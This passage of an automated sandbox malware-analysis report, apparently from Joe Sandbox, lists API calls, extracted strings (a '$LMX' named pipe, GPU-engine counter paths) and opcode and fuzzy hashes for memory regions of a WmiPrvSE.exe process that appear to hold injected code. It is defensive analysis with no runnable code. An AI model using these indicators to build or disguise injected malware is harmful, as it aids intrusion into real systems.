                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID: destructor'$ned$restrict(
                                                                • API String ID: 190073905-924718728
                                                                • Opcode ID: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction ID: 281a0115f237cdfce01540164a040d626c0561bcceaadc7465c3b437b63eccfd
                                                                • Opcode Fuzzy Hash: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction Fuzzy Hash: B181C07CA00E7386FB649B2599413F966F3AF85780F48A7359B0B87392DB38C865C300

                                                                Control-flow Graph

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968C9D7
                                                                • FlsGetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968C9EC
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA0D
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA3A
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA4B
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA5C
                                                                • SetLastError.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA77
                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CAAD
                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001F5A968E86C,?,?,?,?,000001F5A968BB3F,?,?,?,?,?,000001F5A9687FB0), ref: 000001F5A968CACC
                                                                  • Part of subcall function 000001F5A968D26C: HeapAlloc.KERNEL32(?,?,00000000,000001F5A968CBA2,?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968D2C1
                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CAF4
                                                                  • Part of subcall function 000001F5A968D2E4: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F5A968651A), ref: 000001F5A968D2FA
                                                                  • Part of subcall function 000001F5A968D2E4: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F5A968651A), ref: 000001F5A968D304
                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CB05
                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CB16
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                • String ID:
                                                                • API String ID: 570795689-0
                                                                • Opcode ID: ea1292907b734e9d11e3fcb84ab3080f1f1bdd44d437ee5c68a8aa9021d0ae61
                                                                • Instruction ID: aa1ca9ccc57a0a004c6964f139de8c01c752a96db99e4562897ce20bbd4ee722
                                                                • Opcode Fuzzy Hash: ea1292907b734e9d11e3fcb84ab3080f1f1bdd44d437ee5c68a8aa9021d0ae61
                                                                • Instruction Fuzzy Hash: 4441493D201E6242FB58AB35A5A13F93AB35F487A0F14E735AB7747AD6DE28C4314201
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm$tion
                                                                • API String ID: 849930591-1951732439
                                                                • Opcode ID: f09f3e55a90dba3aa5aeadb654ffa2933525b3c08332907f23dcf0ef50790ffa
                                                                • Instruction ID: 14a7688fc9a60c2eaeecc28a9aab213da98bcb4e8e6d436ecef43e40f32654a5
                                                                • Opcode Fuzzy Hash: f09f3e55a90dba3aa5aeadb654ffa2933525b3c08332907f23dcf0ef50790ffa
                                                                • Instruction Fuzzy Hash: 7FD1903A600B6186EB60DF65D4803ED77B2FB55798F542225EF8A57B9ACB38C4A4C700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$CounterInfoProcess$AllocFree
                                                                • String ID: \GPU Engine(*)\Running Time
                                                                • API String ID: 1943346504-1805530042
                                                                • Opcode ID: bb0a2a73af2016f53cbc39c7c9dc4f70784d8041b84a51f4256f99a6a5f0cca6
                                                                • Instruction ID: e313d6b130846d30a5157a0387079feb843a633eb98ca7b28701cf1f12e63677
                                                                • Opcode Fuzzy Hash: bb0a2a73af2016f53cbc39c7c9dc4f70784d8041b84a51f4256f99a6a5f0cca6
                                                                • Instruction Fuzzy Hash: 37319F36600F6392EB10DF26E8047E9A7B2BF88BC5F4493359F4A47A24DF38C0668740

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$CounterInfoProcess$AllocFree
                                                                • String ID: \GPU Engine(*)\Utilization Percentage
                                                                • API String ID: 1943346504-3507739905
                                                                • Opcode ID: ddaf5f6d871703ba70be204d02f7f79d3460779af134fd451bd3b067dddc4e4b
                                                                • Instruction ID: 501f8f14ddbf46d3fda791760e549a59aa916d9713dfef1c29b203fa02e6a886
                                                                • Opcode Fuzzy Hash: ddaf5f6d871703ba70be204d02f7f79d3460779af134fd451bd3b067dddc4e4b
                                                                • Instruction Fuzzy Hash: EA315039610F6386EB50DB26A844BE967B2BB84F84F04A2359F4B47725DE38C4658700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 849930591-393685449
                                                                • Opcode ID: fa73655f7b7bd44e3e4d6446ad22319a2763a7ac19eba2559d2b609f8e2af79f
                                                                • Instruction ID: 8cf5bd1060aecb248f18b15918fddee17702db1596663ea5d0b3082e2d5d76ad
                                                                • Opcode Fuzzy Hash: fa73655f7b7bd44e3e4d6446ad22319a2763a7ac19eba2559d2b609f8e2af79f
                                                                • Instruction Fuzzy Hash: 4ED1AF76610B628AEB20DF65D4403ED7BB2FB45788F10A325EF8A57B96CB34C5A1C701

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeLibraryProc
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 3013587201-537541572
                                                                • Opcode ID: dbadeb88dc87e3b828c2078f2cbd2f6a3078456db927c7acdc20e85c0feead20
                                                                • Instruction ID: bd87ae7fd6780d90ee3a6f4b4dfde8cf355deb03746049640dde659a5939dc23
                                                                • Opcode Fuzzy Hash: dbadeb88dc87e3b828c2078f2cbd2f6a3078456db927c7acdc20e85c0feead20
                                                                • Instruction Fuzzy Hash: C941D33A321E3245EB16CB26A8547F526B2BF48BE0F15A7359F1F5B784EE38C4658340

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                • String ID: d
                                                                • API String ID: 3743429067-2564639436
                                                                • Opcode ID: 5a58378ec682f77b284a5a83fb5b6f102801a0cd5293b6f0a8f96f7b28fbadf9
                                                                • Instruction ID: fbf3de63645309af1ccd4d04a2506a212f7b20fe7b776645e42e9b47978efc3b
                                                                • Opcode Fuzzy Hash: 5a58378ec682f77b284a5a83fb5b6f102801a0cd5293b6f0a8f96f7b28fbadf9
                                                                • Instruction Fuzzy Hash: 71414D76214B91C6E760CF61E4443AE77B2F788B98F449225DB8A4B758DF38C459CB40

                                                                Control-flow Graph

                                                                APIs
                                                                • FlsGetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC27
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC46
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC6E
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC7F
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID: 1%$Y%
                                                                • API String ID: 3702945584-1395475152
                                                                • Opcode ID: 73f99dd158d02f66700fb77c4ca87c0b903f96ca38ef138df72cf0141c470259
                                                                • Instruction ID: 70642205af09bb767061929add3d51bc13c819841e5d26c10d5d4f12907b7e30
                                                                • Opcode Fuzzy Hash: 73f99dd158d02f66700fb77c4ca87c0b903f96ca38ef138df72cf0141c470259
                                                                • Instruction Fuzzy Hash: FD117F39704E6241FB585B36AA953F93AB35F847E0F18E335677B076D6DE28C4214200

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                • String ID: \\.\pipe\$LMXchildproc
                                                                • API String ID: 166002920-4086216030
                                                                • Opcode ID: b4f5737ec96b0c9e0b320a30835d4fc4977b95f942ea24fc39ad3b6124d69255
                                                                • Instruction ID: 93f2766c167c9d500ba7f0908a4681cc9f9d984afc01ba65b53184cd3dce1a79
                                                                • Opcode Fuzzy Hash: b4f5737ec96b0c9e0b320a30835d4fc4977b95f942ea24fc39ad3b6124d69255
                                                                • Instruction Fuzzy Hash: 64115135614F5282EB108B21F5447A97771FB89BE5F505325EB6A07BA8CF7CC168CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction ID: cbd04626af794b0ee347da996cb5fec45c294747d84217c8e451300385ccd701
                                                                • Opcode Fuzzy Hash: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction Fuzzy Hash: 4B81B338600F3786FB50AB65A4913F96AB3AF85780F18F3359B1B47796DB38C9658700
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689A31
                                                                • GetLastError.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689A3F
                                                                • LoadLibraryExW.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689A69
                                                                • FreeLibrary.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689AD7
                                                                • GetProcAddress.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689AE3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: 4b8a36a4a4a2b0dd80eede7cdc1baa3105cb8079cac949a61d2893f2abe26ef9
                                                                • Instruction ID: 6a3ee1aa0d60bfc83de5c4d68f92eea4043ec95a64bcd603de47a9d844f5d45e
                                                                • Opcode Fuzzy Hash: 4b8a36a4a4a2b0dd80eede7cdc1baa3105cb8079cac949a61d2893f2abe26ef9
                                                                • Instruction Fuzzy Hash: 8B31C239212F62A1EF519B4298007F527B6BF44BA4F59A736DE2F0B794EF38C4648300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID: CONOUT$
                                                                • API String ID: 3230265001-3130406586
                                                                • Opcode ID: 12c2d174039e60869952cb61123dfc76bc67eb013c11dd170298cf19353e4692
                                                                • Instruction ID: 38f35608f515abd90daae69449c3644edb120b4412131012800fddb7f14dcb8e
                                                                • Opcode Fuzzy Hash: 12c2d174039e60869952cb61123dfc76bc67eb013c11dd170298cf19353e4692
                                                                • Instruction Fuzzy Hash: 42118135310F5282E7508B56F8847A976B1FB88BE8F101325EB6F8BB94DF38C8648740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                • String ID: wr
                                                                • API String ID: 1092925422-2678910430
                                                                • Opcode ID: 5b1397cb5b50c8101928f34d71be35eaa6444752faf99293e0902f100c4b543c
                                                                • Instruction ID: 7f018a560ba6905d482e40d185af31710443b8c7db82e2c8200b51b337a43592
                                                                • Opcode Fuzzy Hash: 5b1397cb5b50c8101928f34d71be35eaa6444752faf99293e0902f100c4b543c
                                                                • Instruction Fuzzy Hash: E7117C3A300B5282EF249B22E4496A96672FB88B94F044635DF9E0B758EF3DC5548700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Thread$Current$Context
                                                                • String ID:
                                                                • API String ID: 1666949209-0
                                                                • Opcode ID: 19d745c72799060c9935a4a8aa146f0e2f5e42f3a6b8fedce84a208a8406b2a8
                                                                • Instruction ID: 87d3b39804df34a6b113a2c3955ae02a96b04620b3cdcff1882cf058066b23c2
                                                                • Opcode Fuzzy Hash: 19d745c72799060c9935a4a8aa146f0e2f5e42f3a6b8fedce84a208a8406b2a8
                                                                • Instruction Fuzzy Hash: 35D1AC3A204F5986DB709B06E4943AA7BB1F7C8B84F115626EBCE47BA5DF38C551CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID: $LMX
                                                                • API String ID: 756756679-1475574623
                                                                • Opcode ID: 9c8b55f238741d735e4a54714f017bc321d4de259bfeef26000a0906f35dcd8a
                                                                • Instruction ID: 5ad9aeee4e79bc299f7b1e7b377757f53caf3ee4a7ebe6b77ec56aa3c4f17795
                                                                • Opcode Fuzzy Hash: 9c8b55f238741d735e4a54714f017bc321d4de259bfeef26000a0906f35dcd8a
                                                                • Instruction Fuzzy Hash: B9315B3A701F6282EB52DF56A544BF96BB2BF44B84F08A2309F4A47B55EF38C4758340
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CB4F
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CB85
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBB2
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBC3
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBD4
                                                                • SetLastError.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBEF
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Value$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2506987500-0
                                                                • Opcode ID: b08d9a4c7f7b46a4b2fd56df4838c4c74be0a96ae1611579e3cdb80d27ea737b
                                                                • Instruction ID: 921fdb247d33ca173ef3189cc757ad435c72e69e86d4f873f1da16f7060f765f
                                                                • Opcode Fuzzy Hash: b08d9a4c7f7b46a4b2fd56df4838c4c74be0a96ae1611579e3cdb80d27ea737b
                                                                • Instruction Fuzzy Hash: 49114D3D205EA241FB546B31A5913F93AB79F487F0F14E7359B77476DADE28C4218240
                                                                APIs
                                                                Memory Dump Source
